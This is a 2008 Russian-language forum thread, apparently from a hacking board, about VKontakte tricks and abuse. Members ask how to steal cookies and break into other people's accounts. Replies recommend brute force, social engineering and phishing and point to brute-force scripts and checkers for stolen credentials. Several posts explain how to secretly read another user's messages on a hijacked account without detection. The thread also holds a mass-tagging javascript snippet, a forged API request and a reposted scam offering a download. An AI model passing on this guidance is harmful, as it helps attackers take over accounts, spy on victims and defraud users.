http://vkontakte.ru/groups.php?act=members&pagesfull/act=getpagesfull&gid=2&op=2

geforse
27.11.2008, 18:59
Не могу утверждать баг это или глюк, но при отправке ЛС пользователю мне выдаёт сегодня весь день:

http://s58.radikal.ru/i159/0811/bb/a02e0d6f33c1.jpg

Не баг это и не глюк)) просто Дуров дедики ребутает :)

heretic1990
27.11.2008, 22:50
вот, вроде ещё не писали, юзал поиск не нашол, если повтор то извините))

Просмотр закрытых страниц вконтакте пользователей, которые скрыли свою страницу

Просмотр альбомов:
http://vkontakte.ru/photos.php?id=[ id]

Просмотр видео:
http://vkontakte.ru/video.php?id=[ id]

Фото на которых отмечен этот человек:
http://vkontakte.ru/photos.php?act=user&id=[ id]

Видео на которых отмечен этот человек:
http://vkontakte.ru/video.php?act=tagview&id=[ id]

Просмотр его друзей (если не закрыты):
http://vkontakte.ru/friend.php?id=[ id]

Просмотр заметок:
http://vkontakte.ru/notes.php?id=[ id]

Просмотр вопросов:
http://vkontakte.ru/questions.php?mid=[ id]

Просмотр групп:
http://vkontakte.ru/groups.php?id=[ id]

_nic
28.11.2008, 02:09
Можно кому то написать на стену если там стоит ограничение только для его друзей?

Ctr1A1tDe1ete
28.11.2008, 03:06
нельзя

FarshikARc
28.11.2008, 11:44
Народ здраствуйте все!!! Я такой человек, что если я за чтото взялся я пытаюсь зделать Добиться своего но тут не как не выходит с одной фотографией. Возился и своими методами не вышло помагите плиз.

http://vkontakte.ru/photos.php?act=show&id=14359366_116331199&uid=2549545
Сама фотка

http://vkontakte.ru/photos.php?act=user&id=2549545
Где я это фото увидел!!! Первый ряд 5-я с низу.

Это не то фото которое мне нужно (к этаму я доступ сам могу получить). Просто это фото закрыто точно также. Опишите способ как его посматреть, Можно без всяких коментов!!! :o Зарание спасибо)))

Fepsis
28.11.2008, 13:09
По обеим ссылкам:
"Только друзья пользователя могут просматривать эту страницу."

user3000
29.11.2008, 22:49
А че, через подмену буквы на "х" фотки защищенные настройками приватности не посмотреть? Сервер возвращает ошибку 404.

geforse
30.11.2008, 00:35
Опишите способ как его посматреть

Левый акк. + СИ = во френды и фотка твоя)

А че, через подмену буквы на "х" фотки защищенные настройками приватности не посмотреть? Сервер возвращает ошибку 404.

Да закрыли уже багу)

sabe
30.11.2008, 10:08
user3000 Fepsis
взламай друга будь другом))

user3000
30.11.2008, 13:58
Я вот думаю что может это из за того что этот человек лишь отмечен на фотке а сама фотка залита другим, вот и вылетает в 404. Не может же быть так что сервак делает копии фоток и кладет их во все аккаунты кто отмечен.

geforse
30.11.2008, 16:41
user3000 пару страниц назад уже пытались вычислить алгоритм "смотрения" скрытых фоток = )

_nic
02.12.2008, 12:48
Если у кого писать на стену разрешенно только друзьям,и мне получится добавится в друзья кому то из его друзей то я с могу писать на его стену?

iddqd
02.12.2008, 12:52
друзья и друзья друзей- разные вещи

geforse
02.12.2008, 16:38
Если у кого писать на стену разрешенно только друзьям,и мне получится добавится в друзья кому то из его друзей то я с могу писать на его стену?

нет

xtra
04.12.2008, 15:17
народ привет, подскажите как методом шифруется remixid??

freddi
04.12.2008, 23:33
xtra, нет уже такого параметра.

xtra
05.12.2008, 12:05
извиняюсь, remixsid

забыл s ...

geforse
05.12.2008, 15:33
эт где такой параметр ? в куках чтоли был ?

login999
05.12.2008, 15:38
эт где такой параметр ? в куках чтоли был ?
Не только был, а и до сих пор есть :)

freddi
05.12.2008, 16:15
извиняюсь, remixsid

забыл s ...

а какая разница чем он шифруется и зачем его расшифровывать?

idTalis
05.12.2008, 21:20
Подскажите плиз рабочий, паблик чекер акков, по возможности ссылки преводите

avgust
05.12.2008, 21:25
VKTools,попробуй

xtra
05.12.2008, 23:12
а какая разница чем он шифруется и зачем его расшифровывать?


дело в том что у меня хэш есть, мыло знаю, а как быть с remixsid ?

freddi
05.12.2008, 23:35
xtra, для авторизации во вконтакте по кукам нужны только remixemail, remixmid и remixpass.
remixpass это мд5 пароля.

scarm
08.12.2008, 16:41
возможно ли угнать куки юзера вконтакте через iframe на своем сайте если туда пришел посетитель напрямую с контакта? Ответьте в личку плиз
P.S.интересует не только iframe а любой возможный способ

AlexV
08.12.2008, 16:47
Подскажите плиз рабочий, паблик чекер акков, по возможности ссылки преводите
Во-первых, remixsid - это с куков, но по этому параметру еще и не вылазиет капча.

6_Чем можно прочекать аккаунты?!
Ответ:

Чекер от Chaak'a (http://forum.antichat.ru/thread88874.html)
Чекер от Isis'a (http://forum.antichat.ru/thread89269.html)
Ручками)

*eXe*
09.12.2008, 13:07
есть щас рабочий скрипт для добавления всех друзей в группу?

Что то я не могу найти

*eXe*
09.12.2008, 16:43
и ещё.. есть скрипт или прога, которая преобразовывает пароли от аккаунтов с логов пинча в вид мыло;пароль

ZombeR
09.12.2008, 22:15
мм паша постебался? О_о
http://vkontakte.ru/pages.php?p=Flash&o=-1

------------
FLASH API » Несвежие новости » Flash
Просмотр История
Flash
Привет Всем Привет Паша Дуров

ХУЙ вам

ахахахахахахха______жесть...
-----------------

freddi
09.12.2008, 22:19
http://vkontakte.ru/pages.php?id=351&act=history

$ED$
10.12.2008, 17:25
Павел Дуров
СПбГУ '06
кажуць, глюк прайшоў.
Обновлено 9 часов назад

Hiromant_001
14.12.2008, 15:38
Ребят,подскажите ламеру,как взломать чужой акк?? При этом я не знаю мыла,пасса.Только ID Жертвы.С хелпой в пм или на форум плиз :)

elimS2
14.12.2008, 19:31
как узнать хеш фотографии вконтакте?
хеши там типа rar7hd8a
и что это за хеш?

__

Хотел доступиться до фотки с приватными настройками.
Думал доступиться методом отмечивания себя на фотки или методом добавления коментария. Отметить не получилось.
Решил повозиться с добавлением комента для этого надо перейти по ссылке

http://vkontakte.ru/photos.php?act=a_post_comment&add_bookmark=1&aid=айди_албома&comment=test&hash=8n941f2k&id=айди_фотки

если хеш не правильный пишет ошибку Security Error

Вопрос как узнать этот хеш ? хеш от коментов не зависит. меняеться только при смене коментируемой фотки

Или может подскажете как можно посмотреть закрытое фото

AlexV
15.12.2008, 14:58
и ещё.. есть скрипт или прога, которая преобразовывает пароли от аккаунтов с логов пинча в вид мыло;пароль
Есть.

*eXe*
16.12.2008, 00:49
если человек сам удалит свою анкету, то голоса, которые он раздал другим людям, пропадают?

Есть.
нашол... спасибо за наставление на путь истинный. Без тебя бы никак

Hiromant_001
16.12.2008, 01:09
Ребят,помогите взломать акк одного человека. Я знаю мыло жертвы,но результат нужен побыстрее...прошу вас,помогите!

geforse
16.12.2008, 17:50
если человек сам удалит свою анкету, то голоса, которые он раздал другим людям, пропадают?

нет

geforse
16.12.2008, 17:52
Ребят,помогите взломать акк одного человека. Я знаю мыло жертвы,но результат нужен побыстрее...прошу вас,помогите!

Брут+СИ+Фейк

Sarkis
16.12.2008, 23:34
незнаю баян или нет
но я об этом узнал только что
еси в контакте на стенке или в коментакх написать javascript

после нажатия отправить получаеца javas?1?ript

З.Ы. Нагами не пинать...лично я об этом узнал только что

TAULUMyca
16.12.2008, 23:45
c DELETED тоже самое = )

EverLest
17.12.2008, 11:17
А можно ссылки на проги для взлома контакта?

qazer
17.12.2008, 11:25
А можно ссылки на проги для взлома контакта?

:D :D :D

geforse
17.12.2008, 15:41
А можно ссылки на проги для взлома контакта?

Дуров ты чтоли ?

Isis
17.12.2008, 19:06
А можно ссылки на проги для взлома контакта?
В php разделе брут с проксями.

alex2120
18.12.2008, 13:30
можно ли сидеть на одном аккаунте двум разным людям и чтоб один из них не знал об этом???

$Atlet$
18.12.2008, 13:50
если изменений ни каких вносить не будеш, и постить с него не будеш, то ДА

alex2120
18.12.2008, 16:14
если изменений ни каких вносить не будеш, и постить с него не будеш, то ДА
в смысле если смотреть за ходом переписки мне же придется обновлять страницу.. это будет у того человека видно? А ваще есть проги что бы смотреть можно было че пишет чел типо как приямой трансляции

Fepsis
18.12.2008, 17:38
В общем сиди себе спокойно от другого имени... Можешь читать переписку, только, чтобы не спалиться, не читай сообщения, которые юзер сам ещё не прочитал.. Не заходи на учётку, если юзер не онлайн, так как это тоже палевно, ему могут сообщить что он онлайн и он поймёт, что кто-то юзает его учётку..))) Ну и естественно сам ничего не меняй, никому не пиши..)))

elimS2
18.12.2008, 17:43
чтоб непалевно читать сообщения которые юзер сам не прочитал, надо открыть уже прочитаное сообщение от того человека и развернуть историю. если же случайно все-таки прочитал - можно его выделить и отметить как непрочитаное

alex2120
18.12.2008, 18:11
Пасиб.. теперь ясно. А возможно так сделать чтобы все его действия отображались у меня?

Hiromant_001
18.12.2008, 20:46
Кто подробно расскажет,какими прогами ломать контакт и последовательные действия?Научите ломать контакт плиз :)

skulltrail
18.12.2008, 21:26
если изменений ни каких вносить не будеш, и постить с него не будеш, то ДА
Чтоб вапще безпалевно, заходи на его акк инвизом, например через прогу vkontakte a-vision.

sabe
19.12.2008, 08:02
нужен рабочий способ чтобы отметить всех на фотке

_krad_
21.12.2008, 12:32
Кто-нибудь находил на ВК какой-нибудь RSS feed?

CrazyStudentS_Mi}{
21.12.2008, 13:53
Кто-нибудь находил на ВК какой-нибудь RSS feed?


есть рсс в комментариях к твоим фотоальбомам

EverLest
21.12.2008, 21:06
Ошибся малость)) Не проги а скрипты))

PYMBA
22.12.2008, 17:04
нужен рабочий способ чтобы отметить всех на фотке


вот по идее должен работать
javascript:for(blabla=0;blabla<5000;blabla++){ var elem = document.getElementById('f'+blabla); if(elem == null) break; elem.onclick(); }

I love this game
25.12.2008, 04:05
При создании новости в группе разрешены некоторые коды, а именно http://vkontakte.ru/page73043 можно попытаться помутить и получить xss! Мне так кажется! Кто додумается прошу не забыть про мое ПМ)

avgust
25.12.2008, 04:19
нужен рабочий способ чтобы отметить всех на фотке
sabe,смотри:

Требования: Mozilla Firefox >= 2

Для того, чтобы отметить всех друзей на фотке, надо:
1. Откройте любую фотографию в вашем альбоме
2. Нажмите кнопку "Отметить человека"
3. Выберите любую область на фотографии
4. Вставьте в адресную строку следующий код. Только не забудьте убрать пробел в "java script"

java script:(function() { function getPhotoInfo() { if(res = /id=(\d+)_(\d+)/.exec(location.href)) return {"mid": res[1], "pid": res[2]}; else return {"mid": 0, "pid": 0}; } function getMyID() { var anchs = document.getElementsByTagName("a"); for(i = 0; i < anchs.length; i++){ if(res = /id(\d+)/.exec(anchs[i].href)) return res[1]; } return 0; } window.adostes_mark = function(i){ if(friends == undefined || i >= friends.length){ if(rotating = document.getElementById("rotating")) rotating.innerHTML = "<h4> All friends have marked on this photo!</h4>"; window.clearTimeout(window.adostes_timer); return; } request_uri = "http://vkontakte.ru/photos.php?act=put&pid="+window.adostes_mid+"_"+window.adostes_pid+"&id="+window.adostes_mid+"&oid=0&subject="+friends[i]["id"]+"&name="+encodeURI(friends[i]["name"])+"&add=1&x="+(Math.random()*100)+"&y="+(Math.random()*100)+"&x2="+(Math.random()*100)+"&y2="+(Math.random()*100); img = new Image(); img.src = request_uri; if(commentArea = document.getElementById("commentArea")) commentArea.innerHTML = i + " of " + friends.length + " friends marked!"; var new_index = i+1; window.adostes_timer = window.setTimeout("window.adostes_mark(" + new_index + ")", 500); }; window.adostes_markallf = function(){ if(!friends){ alert("Click \"Mark human\"!"); return; } if(!confirm("Are you sure want to mark all friends?\r\nAuthor: Nikolay Khodov (id5500005)")) return; if(rotating = document.getElementById("rotating")) rotating.innerHTML = "<h4> Processing <img src=\"http://vkontakte.ru/images/upload.gif\"><br /> Please wait...</h4>"; window.adostes_timer = window.setTimeout("window.adostes_mark(0)", 0); }; var mid; var pid; var myid = getMyID(); var info = getPhotoInfo(); if(!(location.href.match(/vkontakte.ru/) && location.href.match(/photo/))) { alert("Open page with your photo"); return; } window.adostes_pid = info["pid"]; window.adostes_mid = info["mid"]; adostes_markallf(); })();

4. Нажмите Enter и ждите: в области ввода комментария отображается процесс отмечания.

sabe
25.12.2008, 09:24
вроде все правильно делаю( не пашет... проверьте кто тО?

[dei]
25.12.2008, 10:56
вроде все правильно делаю( не пашет... проверьте кто тО?
все работает (FF3). скрипт не моментально отмечает, подожди пару минут.

avgust
25.12.2008, 11:26
всё работает,перед тем как выложил - проверил
попробуй ещё раз внимательно (Mozilla Firefox,не забудь убрать пробел в java script)

sabe
25.12.2008, 12:07
да не ребят, я скрипт на подобее этого пробвал давно еще норм было, знаю как происходит.. этот тупо молчит ff3 (

Wasson
25.12.2008, 14:47
незнаю у меня всё ок работает

vnuki
25.12.2008, 16:00
Как добавить самого себя в друзья!!!

Качаем HTTP Intruder v 1.4.2
Например отсюда http://hellknights.void.ru/releases/HTTPIntruderv1.4.2.msi
Для его работы нужен Microsoft Framework.

Устанавливаем. Запускаем.

1. В форму Request header вставляем ниже идущий "текст":

POST /auth HTTP/1.1
User-Agent: HelloDurov 0.1
Host: login.userapi.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: ru
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: gzip, deflate
UA-CPU: x86
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Cache-Control: no-cache
Connection: Close

site=2&id=0&login=force&fccode=0&fcsid=0&email=мой_логин&pass=мой_пароль


2. Исправляем "мой_логин" и "мой_пароль" на свои аутентификационные данные от Вконтакта.

3. Подсчитываем и исправляем Content-Length. это кол-во символов в последней строке области Request header, т.е. строка с уже исправленными "мой_логин" и "мой_пароль" ("site=2&id=0&login=force&fccode=0&fcsid=0&email=мой_логин&pass=мой_пароль" (без кавычек)).
4. Жмем Send.


5. Получаем ответ от сервера. Смотрим форму Header области Responsed Data.
6. Копируем в буфер обмена то чему равняеться sid.
7. HTTP Intruder нам больше не понадобиться. Можем закрыть. Открываем броузер.

8. Составляем URL.
userapi.com/data?&act=add_friend&id=мой_айди&sid=мой_сид
где мой_айди это ваш идентификационный номер Вконтакте,
а sid мы получили в 6-ом пункте.
9. URL в броузер и жмем ENTER. там будет {"ok": 1}; обновляем свою страничку и видим там новую заявку от себя же.
10. По тому же составленнему URL переходим еще раз, и видим {"ok": 2}.
Обновляем список друзей и видим "себя" там.


Сам Лично пробовал.Всё работает...... ;)

Twilight Shadow
25.12.2008, 17:08
Как добавить самого себя в друзья!!!

Сам Лично пробовал.Всё работает...... ;)

Забавно... Сам Лично пробовал.Всё НЕ работает...... :(
ок=-1 << про такое даже в документации ничего не сказано... хм.. поидее ошибка авторизации.. но ет исключено.. мне бы просто sid не дали

F1shka
26.12.2008, 17:46
Забавно... Сам Лично пробовал.Всё НЕ работает...... :(
ок=-1 << про такое даже в документации ничего не сказано... хм.. поидее ошибка авторизации.. но ет исключено.. мне бы просто sid не дали
SID помоему есть у каждого в куках. МБ. руки кривые? Опробую завтра, отпишусь.

Fepsis
26.12.2008, 18:25
2 vnuki
userapi.com Что за сайт..??!?

Twilight Shadow
26.12.2008, 21:58
SID помоему есть у каждого в куках. МБ. руки кривые? Опробую завтра, отпишусь.
в куках remixid ;)

userapi.com Что за сайт..??!?
сайт с узерапи :о
для управления соц сетями

Mazenratt
26.12.2008, 22:42
Нашёл в инете, работает, но тока если рейт поднимать не более чем на 100%=)

Здравствуйте, дочитайте пожалуйста это сообщение до конца.

Это не лохотроны типо отправьте сообщение на этот номер с таким то id (как правило id того, кто пишит это вам), нет. Предлогаю вашему вниманию способ повышения рейтинга с очень маленькими затратами ~30 руб (то есть стоимость трёх голосов, заказанных при помощи СМС). Спрашиваете зачем мне это надо, отвечу : личная неприязнь к Дурова. Когда тока открывался ВКонтакте я начал ломать его (сайт) и дуров забанил меня на нём, позже я сменил IP и вот я с вами=) хотя с другой стороны мне надо сказать ему спасибо, ведь именно благодаря ему я стал так называемым хакером, я же предпочитаю называться интернет-программистом=)

И так начнём. Сейчас я вам представлю шаги, следуя по которым вы сможете поднять себе рейтинг:

1) Отправте СМС со своим id на номер 1045 ( тем самым вы получаете 3 голоса на своей странице ВКонтакте, расценки отправки СМС на http://vkontakte.ru/payments.php?act=sms ) они нужны для того, чтобы при взломе рейта на вашей странице моей прогой - она (прога) голосовала за вас этими 3-мя голосами, просто изменив при отправлении пакета html сигналов с вашей страници число 3 на выбранное вами число(Если у вас уже есть на странице от 3 и больше неиспользованных голосов, то смело переходите к следующему пункту (прога использует только 3 голоса))

2) После того, как у вас на странице справа появилась надпись “У Вас 3 неиспользованных голосов” – качайте, разработанную мной программу для повышения рейтинга отсюда ~> http://depositfiles.com/files/i17ohd20s ПРИМЕЧАНИЕ: не пользуйтесь программой, пока голоса не появятся на вашей странице.

3) После того, как вы закачаете программу (весит она всего 767 КБ), запустите её, заполните все поля верной информацией о вашей странице и выберите нужное вам количество рейтинга (советую набирать за 1 раз не более 1000 %, иначе админы сайта ВКонтакте могут пропалить то , что вы повышаете рейтинг незаконно) и жмите клавишу “Поднять”

4) В течении 1.5 минуты ваш рейтинг поднимится на выбранное вами количество %. О счастье=) (если не поднялось через 1.5 минуты - не переживайте, просто сервер рейтинга ВКонтакте перегружен…Уж простите это уже не от мя зависит, а от самого проекта ВКонтакте)


Если вы хотите поднять свой рейтинг ещё. То повторите всю процедуру с первого шага, за исключением “скачать программу” конечно=)


Почему вы можете мне доверять:

1) Вы не высылаете мне свои данные (и-мэйл и пороль), то есть я не преследую цель получить доступ к вашей странице и уж поверьте, если б я хотел взломать вашу страницу, я б взломал и вы бы даже не узнали ;)

2) Вы не высылаете СМС с чужым id , а в лубом случае получаете эти 3 голоса на свою страницу, я не прошу высылать голоса на мою страницу.

Да и вообще на самом деле решать вам пользоваться моей прогой или нет, как говорится моё дело предложить…

С уважением HaCkeR Sn1peR. По всем вопросам вы можете обратиться на e-mail sn1per@mail.ru или ICQ 405118970

Stz1
26.12.2008, 22:44
Нашёл в инете, работает, но тока если рейт поднимать не более чем на 100%=)

Здравствуйте, дочитайте пожалуйста это сообщение до конца.

Это не лохотроны типо отправьте сообщение на этот номер с таким то id (как правило id того, кто пишит это вам), нет. Предлогаю вашему вниманию способ повышения рейтинга с очень маленькими затратами ~30 руб (то есть стоимость трёх голосов, заказанных при помощи СМС). Спрашиваете зачем мне это надо, отвечу : личная неприязнь к Дурова. Когда тока открывался ВКонтакте я начал ломать его (сайт) и дуров забанил меня на нём, позже я сменил IP и вот я с вами=) хотя с другой стороны мне надо сказать ему спасибо, ведь именно благодаря ему я стал так называемым хакером, я же предпочитаю называться интернет-программистом=)

И так начнём. Сейчас я вам представлю шаги, следуя по которым вы сможете поднять себе рейтинг:

1) Отправте СМС со своим id на номер 1045 ( тем самым вы получаете 3 голоса на своей странице ВКонтакте, расценки отправки СМС на http://vkontakte.ru/payments.php?act=sms ) они нужны для того, чтобы при взломе рейта на вашей странице моей прогой - она (прога) голосовала за вас этими 3-мя голосами, просто изменив при отправлении пакета html сигналов с вашей страници число 3 на выбранное вами число(Если у вас уже есть на странице от 3 и больше неиспользованных голосов, то смело переходите к следующему пункту (прога использует только 3 голоса))

2) После того, как у вас на странице справа появилась надпись “У Вас 3 неиспользованных голосов” – качайте, разработанную мной программу для повышения рейтинга отсюда ~> http://depositfiles.com/files/i17ohd20s ПРИМЕЧАНИЕ: не пользуйтесь программой, пока голоса не появятся на вашей странице.

3) После того, как вы закачаете программу (весит она всего 767 КБ), запустите её, заполните все поля верной информацией о вашей странице и выберите нужное вам количество рейтинга (советую набирать за 1 раз не более 1000 %, иначе админы сайта ВКонтакте могут пропалить то , что вы повышаете рейтинг незаконно) и жмите клавишу “Поднять”

4) В течении 1.5 минуты ваш рейтинг поднимится на выбранное вами количество %. О счастье=) (если не поднялось через 1.5 минуты - не переживайте, просто сервер рейтинга ВКонтакте перегружен…Уж простите это уже не от мя зависит, а от самого проекта ВКонтакте)


Если вы хотите поднять свой рейтинг ещё. То повторите всю процедуру с первого шага, за исключением “скачать программу” конечно=)


Почему вы можете мне доверять:

1) Вы не высылаете мне свои данные (и-мэйл и пороль), то есть я не преследую цель получить доступ к вашей странице и уж поверьте, если б я хотел взломать вашу страницу, я б взломал и вы бы даже не узнали ;)

2) Вы не высылаете СМС с чужым id , а в лубом случае получаете эти 3 голоса на свою страницу, я не прошу высылать голоса на мою страницу.

Да и вообще на самом деле решать вам пользоваться моей прогой или нет, как говорится моё дело предложить…

С уважением HaCkeR Sn1peR. По всем вопросам вы можете обратиться на e-mail sn1per@mail.ru или ICQ 405118970

)))))))

Twilight Shadow
27.12.2008, 02:40
Нашёл в инете, работает, но тока если рейт поднимать не более чем на 100%=)

(советую набирать за 1 раз не более 1000 %
oOps... нестыковочка :rolleyes:

ну а вообще резко встал вопрос по поводу рейтинга.. ктонить оплачивал себе рейтинг?) как происходит процедура? просто присылаешь смс с id... или тебе чтото ещё приходит и ты это должен кудато ввести? :confused:

avgust
27.12.2008, 13:30
oOps... нестыковочка :rolleyes:

ну а вообще резко встал вопрос по поводу рейтинга.. ктонить оплачивал себе рейтинг?) как происходит процедура? просто присылаешь смс с id... или тебе чтото ещё приходит и ты это должен кудато ввести? :confused:
просто присылаешь смс.
ни4его вводить ненужно, иначе уже давно бы бруты написали)))

Twilight Shadow
27.12.2008, 18:18
просто присылаешь смс.
ни4его вводить ненужно, иначе уже давно бы бруты написали)))
ну и что тогда мешает слать смс с других телефонов? или нене?

skulltrail
27.12.2008, 20:08
Нашёл в инете, работает, но тока если рейт поднимать не более чем на 100%=)

Здравствуйте, дочитайте пожалуйста это сообщение до конца.
нах тему засорять объемным текстом?

bublebuble
30.12.2008, 00:54
Как добавить самого себя в друзья!!!

Качаем HTTP Intruder v 1.4.2
Например отсюда http://hellknights.void.ru/releases/HTTPIntruderv1.4.2.msi
Для его работы нужен Microsoft Framework.

Устанавливаем. Запускаем.

1. В форму Request header вставляем ниже идущий "текст":

POST /auth HTTP/1.1
User-Agent: HelloDurov 0.1
Host: login.userapi.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: ru
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: gzip, deflate
UA-CPU: x86
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Cache-Control: no-cache
Connection: Close

site=2&id=0&login=force&fccode=0&fcsid=0&email=мой_логин&pass=мой_пароль


2. Исправляем "мой_логин" и "мой_пароль" на свои аутентификационные данные от Вконтакта.

3. Подсчитываем и исправляем Content-Length. это кол-во символов в последней строке области Request header, т.е. строка с уже исправленными "мой_логин" и "мой_пароль" ("site=2&id=0&login=force&fccode=0&fcsid=0&email=мой_логин&pass=мой_пароль" (без кавычек)).
4. Жмем Send.


5. Получаем ответ от сервера. Смотрим форму Header области Responsed Data.
6. Копируем в буфер обмена то чему равняеться sid.
7. HTTP Intruder нам больше не понадобиться. Можем закрыть. Открываем броузер.

8. Составляем URL.
userapi.com/data?&act=add_friend&id=мой_айди&sid=мой_сид
где мой_айди это ваш идентификационный номер Вконтакте,
а sid мы получили в 6-ом пункте.
9. URL в броузер и жмем ENTER. там будет {"ok": 1}; обновляем свою страничку и видим там новую заявку от себя же.
10. По тому же составленнему URL переходим еще раз, и видим {"ok": 2}.
Обновляем список друзей и видим "себя" там.


Сам Лично пробовал.Всё работает...... ;)
тоже -1 получается

eliziym
30.12.2008, 13:52
видел одного чела, у него буквы в нике вверх ногами были,чем можно это замутить?

Yanker
30.12.2008, 14:14
Нашёл в инете, работает, но тока если рейт поднимать не более чем на 100%=)

Здравствуйте, дочитайте пожалуйста это сообщение до конца.

Это не лохотроны типо отправьте сообщение на этот номер с таким то id (как правило id того, кто пишит это вам), нет. Предлогаю вашему вниманию способ повышения рейтинга с очень маленькими затратами ~30 руб (то есть стоимость трёх голосов, заказанных при помощи СМС). Спрашиваете зачем мне это надо, отвечу : личная неприязнь к Дурова. Когда тока открывался ВКонтакте я начал ломать его (сайт) и дуров забанил меня на нём, позже я сменил IP и вот я с вами=) хотя с другой стороны мне надо сказать ему спасибо, ведь именно благодаря ему я стал так называемым хакером, я же предпочитаю называться интернет-программистом=)

И так начнём. Сейчас я вам представлю шаги, следуя по которым вы сможете поднять себе рейтинг:

1) Отправте СМС со своим id на номер 1045 ( тем самым вы получаете 3 голоса на своей странице ВКонтакте, расценки отправки СМС на http://vkontakte.ru/payments.php?act=sms ) они нужны для того, чтобы при взломе рейта на вашей странице моей прогой - она (прога) голосовала за вас этими 3-мя голосами, просто изменив при отправлении пакета html сигналов с вашей страници число 3 на выбранное вами число(Если у вас уже есть на странице от 3 и больше неиспользованных голосов, то смело переходите к следующему пункту (прога использует только 3 голоса))

2) После того, как у вас на странице справа появилась надпись “У Вас 3 неиспользованных голосов” – качайте, разработанную мной программу для повышения рейтинга отсюда ~> http://depositfiles.com/files/i17ohd20s ПРИМЕЧАНИЕ: не пользуйтесь программой, пока голоса не появятся на вашей странице.

3) После того, как вы закачаете программу (весит она всего 767 КБ), запустите её, заполните все поля верной информацией о вашей странице и выберите нужное вам количество рейтинга (советую набирать за 1 раз не более 1000 %, иначе админы сайта ВКонтакте могут пропалить то , что вы повышаете рейтинг незаконно) и жмите клавишу “Поднять”

4) В течении 1.5 минуты ваш рейтинг поднимится на выбранное вами количество %. О счастье=) (если не поднялось через 1.5 минуты - не переживайте, просто сервер рейтинга ВКонтакте перегружен…Уж простите это уже не от мя зависит, а от самого проекта ВКонтакте)


Если вы хотите поднять свой рейтинг ещё. То повторите всю процедуру с первого шага, за исключением “скачать программу” конечно=)


Почему вы можете мне доверять:

1) Вы не высылаете мне свои данные (и-мэйл и пороль), то есть я не преследую цель получить доступ к вашей странице и уж поверьте, если б я хотел взломать вашу страницу, я б взломал и вы бы даже не узнали ;)

2) Вы не высылаете СМС с чужым id , а в лубом случае получаете эти 3 голоса на свою страницу, я не прошу высылать голоса на мою страницу.

Да и вообще на самом деле решать вам пользоваться моей прогой или нет, как говорится моё дело предложить…

С уважением HaCkeR Sn1peR. По всем вопросам вы можете обратиться на e-mail sn1per@mail.ru или ICQ 405118970

чувак отжог.... на такое уже не ведуться....

*eXe*
30.12.2008, 14:24
можноподобрать буквы изиностранных алфавитов... есть сервисы с разными раскладками клавиатуры.
например:

http://i062.radikal.ru/0812/a1/c9b82b8d0dc4.bmp (http://www.radikal.ru)
но это всё не то... я реально виде5л целые тексты, написанные вверх ногами... как это делается? хз

freddi
30.12.2008, 14:40
<P STYLE="filter:FlipV; width: 100;"> Пример текста</P>

для ие.

Assembler
30.12.2008, 15:00
http://vkontakte.ru/id*******?rate=3&v

Кидыаем ссылку во все группы. И ждем когда репа побежит вверх. Вместо звезд свой ID. ТАкже нужно чтобы у чела который перейдет по ссыли были свободные голоса.

*eXe*
30.12.2008, 15:07
ЭТО не работает 100%

пробовал на своих голосах((( бред

Twilight Shadow
30.12.2008, 15:10
видел одного чела, у него буквы в нике вверх ногами были,чем можно это замутить?

ǝlƃ0оƃ (http://www.google.ru/) иʎєqvоuɔи

алфавиты:
zʎxʍʌnʇsɹbdouɯlʞɾıɥƃɟǝpɔqɐ
ʁєqqıqmmҺцхфʎʟɔduонwvʞиєжǝ6Lʚgɐ

покапайся в ворде... символ-вствка... можт чего найдёшь

dinar_007
30.12.2008, 15:11
http://vkontakte.ru/id*******?rate=3&v

Кидыаем ссылку во все группы. И ждем когда репа побежит вверх. Вместо звезд свой ID. ТАкже нужно чтобы у чела который перейдет по ссыли были свободные голоса.
Потом акк локнуть могут...

nikfm
30.12.2008, 16:04
народ это как http: // vkontakte. ru / profile.php?id=20534200

*eXe*
30.12.2008, 16:10
фрод...много фрода.
обычно фейковые аккаунты лочат, но этот был заполнен и его просто вогнали в а*уительный минус

geforse
30.12.2008, 16:10
народ это как http: // vkontakte. ru / profile.php?id=20534200

Пару недель назад тут продавали способ "уменьшения" рейтинга ... наверно есть номер и если слать свой id туда, репа уменьшается :)

gold-goblin
30.12.2008, 16:43
а вот так =) http://vkontakte.ru/video20534200_81402845
просто у него последствия уже наступили =)

geforse
30.12.2008, 17:11
а вот так =) http://vkontakte.ru/video20534200_81402845
просто у него последствия уже наступили =)

Он в коментариях к добавлению рейтинга указал сколько интеров ?))

Stz1
30.12.2008, 17:38
хех)))

у меня однажды была такая фишка

у нас у провайдера есть привелегия брать 1 раз на 3 дня кредит в размере 100 рублей

однажды ночью,как обычно все в лагах интернет кое как грузит,я жал по кнопке взять кредит,много раз нажал:\


в итоге на счету было около 11 000 рублей))))усердно тыкал просто)

geforse
30.12.2008, 17:43
Деньги провайдер вернул ?))

Stz1
30.12.2008, 17:46
Деньги провайдер вернул ?))
нет(((=

досихпор лежат))))

I love this game
30.12.2008, 18:35
А какое отношение твой кредит имеет к контакту?

Stz1
30.12.2008, 18:36
А какое отношение твой кредит имеет к контакту?
я и не говорю что оно какое то отношение имеет к контакту

*eXe*
30.12.2008, 22:12
как сделать, чтобы в личном статусе можно было писать с новой строки?

sabe
30.12.2008, 23:10
*eXe*
было как зделать... вот если что проверте метод:
Уникальный Статус Вконтакте (http://downloadportal.ru/index.php?do=static&page=vk_hack) от DownloadPortal.ru. Если вы хотите выдитится среди других, можете воспользоватся методом:

1)Заходим в Opera. Именно ОПЕРА!

2)Идем на Мою страничку.

3)Нажимаем правой кнопкой мыши и выбираем "Исходный код".(Ctrl+U)

4)Нажимаем Правка->Найти(Ctrl+F).

5)В поле "Поиск" пишем <input style="background-position: center center;" class="inputtext" type="text" id="edit_activity_text" name="edit_activity_text" value="" maxlength="160" onblur="return activity_editor.blur();" onkeypress="return activity_editor.handle_key_press(event);" />

6)Заменяем это на <textarea id="edit_activity_text" name="edit_activity_text" onblur="return activity_editor.blur();" ></textarea>

7)Теперь можно писать статус в столбик, разделяя клавишей "Ввод"("Enter").

